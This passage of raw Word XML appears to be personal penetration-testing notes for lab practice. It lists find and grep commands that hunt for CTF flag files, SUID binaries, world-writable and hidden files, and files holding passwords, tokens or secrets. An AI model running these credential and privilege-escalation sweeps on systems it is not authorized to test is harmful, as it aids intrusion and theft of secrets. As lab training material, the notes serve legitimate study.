        <w:t xml:space="preserve">find / -name proof.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001470">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "user.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001471">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "root.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -iname "flag.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001473">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Case insensitive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001474">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "*.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001475">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding ALL .txt files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001476">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively finding Files of certain type in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">current directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type f -name "*.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001478">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001479">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / type -d -name "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DirNameHere</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Files by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -name "*.php" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching for Files by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -size +100M 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -size -10k 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000147F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding files by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user or group permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001480">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -user root -name "*.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001481">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -o+w 2&gt;/dev/null   # World-writable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 2&gt;/dev/null  # SUID files (potential privilege escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hidden </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files or directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001484">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -name ".*" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001485">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding files with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001486">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -exec grep -l "password" {} 2&gt;/dev/null \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001487">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001488">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001489">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for Readable Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find files that are owned by the current user and readable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1386"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find /home /tmp /var -type f -user $(whoami) -readable 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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8E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wczmvlevqptl" w:id="172"/>
      <w:bookmarkEnd w:id="172"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000148F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001490">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rinE '(password|username|user|pass|key|token|secret|admin|login|credentials)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001491">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searches recursively through current directory for key words</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001492">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command is really useful for looking through something like a directory of FTP or SMB files for useful information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId385">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shenzi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001494">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r : Recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001495">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i : Ignore case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001496">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n : Line numbers: Shows the line number in the file where the match occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-E : Use Extended Regular Expressions (ERE), which allows more powerful regex patterns like | (alternation/or), +, {}, etc., without needing to escape them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001498">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001499">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively search directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
